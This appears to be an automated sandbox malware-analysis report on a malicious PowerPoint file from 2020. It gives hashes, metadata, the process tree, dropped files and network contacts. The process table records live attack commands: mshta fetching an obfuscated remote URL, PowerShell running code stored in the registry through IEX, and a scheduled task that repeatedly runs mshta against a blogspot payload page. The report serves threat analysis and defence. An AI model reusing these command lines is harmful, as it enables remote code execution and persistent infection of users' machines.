File name: | 18cbe831822afef5095d89874bbd2f77.ppt |
Full analysis: | https://app.any.run/tasks/082e4619-ab77-4e0c-ba65-677a7650130c |
Verdict: | Malicious activity |
Analysis date: | September 29, 2020, 22:42:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-powerpoint |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Matters, Keywords: elements, Last Saved By: Master Mana, Revision Number: 5, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 06:46, Create Time/Date: Thu Sep 24 22:54:19 2020, Last Saved Time/Date: Thu Sep 24 23:01:06 2020, Number of Words: 0 |
MD5: | 18CBE831822AFEF5095D89874BBD2F77 |
SHA1: | DE5908CFF3B04006FBBBF4CDC12B56BC108C419A |
SHA256: | E3F198D4F0984FA49B890006E2D9F4ADAE221D56D725471BBCBA81564F4BC2B1 |
SSDEEP: | 768:KHRmd650cCBC3Ygu0jOXRvqX3H2z00RLxcjo:KHRmcKX7iH240VJ |
.pps/ppt | | | Microsoft PowerPoint document (79.7) |
---|
CompObjUserTypeLen: | 25 |
---|---|
CompObjUserType: | Microsoft Forms 2.0 Form |
Title: | - |
Author: | Matters |
Keywords: | elements |
LastModifiedBy: | Master Mana |
RevisionNumber: | 5 |
Software: | Microsoft Office PowerPoint |
TotalEditTime: | 6.8 minutes |
CreateDate: | 2020:09:24 21:54:19 |
ModifyDate: | 2020:09:24 22:01:06 |
Words: | - |
ThumbnailClip: | (Binary data 43336 bytes, use -b option to extract) |
CodePage: | Windows Latin 1 (Western European) |
PresentationTarget: | Widescreen |
Bytes: | - |
Paragraphs: | - |
Slides: | - |
Notes: | - |
HiddenSlides: | - |
MMClips: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2124 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt.pps" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Exit code: 0 Version: 14.0.6009.1000 | ||||
2780 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Version: 14.0.6009.1000 | ||||
2076 | mshta https://%909123id%909123id%909123id%909123id%909123id%909123id%[email protected]\das6d78q3ehjgdbnsavdbnzc | C:\Windows\system32\mshta.exe | POWERPNT.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3272 | powershell ((gp HKCU:\Software).juggga)|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
996 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://madarjaaatresearchers.blogspot.com/p/elevated6666.html""\"", 0 : window.close"\") | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2124 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB83.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR18A0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2076 | mshta.exe | C:\Users\admin\AppData\Local\Temp\TarCD5.tmp | — | |
MD5:— | SHA256:— | |||
2076 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB | binary | |
MD5:1E5056D8F8B7C140EEF5C15B35E1E24A | SHA256:2FB42393AB3227431EA37E5B2406444C8F6309450A4EAFC8229EF7001E23F4BD | |||
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\das6d78q3ehjgdbnsavdbnzc[1].htm | html | |
MD5:F237D98E30B1FDBB809E59E5388D8101 | SHA256:8125AFF31BBCD44F8F3DD840B9621A3531DEC0C41490F81E3926AA1BFF84F6AC | |||
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:C4C9DEC575F1F1E4A98E83AD88CF238D | SHA256:AB790A6F5EB99C01393157CD05874DAA81C05C1E1A8A2CEF270E833399547D70 | |||
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:229712F063FC720B9A179D343F698E56 | SHA256:7ACBA7C9CAFF9AE3B39191652934E16A8E4EC79B261BC224056165F504E7A525 | |||
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\error[1] | — | |
MD5:— | SHA256:— | |||
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\error[1] | — | |
MD5:— | SHA256:— | |||
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\elevated6666[1].htm | html | |
MD5:49219707A511BF0153FE9191E7460893 | SHA256:17B7B6010BD5F6B5F5136083A782B12E972FBFCD0A5F77017CFF14AF8976B7E3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gts1o1core/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQCMfxdJkM%2FCMwIAAAAAektV | US | der | 472 b | whitelisted |
2076 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY%2Bsl%2Bj4yzQuAcL2oQno5fCgQUUWj%2FkK8CB3U8zNllZGKiErhZcjsCEAt2bSBUjvsrlVzk6sKUDkk%3D | US | der | 471 b | whitelisted |
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D | US | der | 468 b | whitelisted |
2076 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D | US | der | 471 b | whitelisted |
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gts1o1core/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEFz6V9fcgk7eCAAAAABXoJg%3D | US | der | 471 b | whitelisted |
1052 | svchost.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2076 | mshta.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2076 | mshta.exe | 172.217.22.137:443 | www.blogger.com | Google Inc. | US | unknown |
2076 | mshta.exe | 142.250.74.227:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
2076 | mshta.exe | 67.199.248.17:443 | j.mp | Bitly Inc | US | shared |
2076 | mshta.exe | 172.217.22.129:443 | madarjaaatresearchers.blogspot.com | Google Inc. | US | whitelisted |
2076 | mshta.exe | 216.58.204.105:443 | resources.blogblog.com | Google Inc. | US | unknown |
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2076 | mshta.exe | 216.58.214.77:443 | accounts.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
j.mp |
| shared |
ocsp.digicert.com |
| whitelisted |
madarjaaatresearchers.blogspot.com |
| whitelisted |
ocsp.pki.goog |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
google.com |
| whitelisted |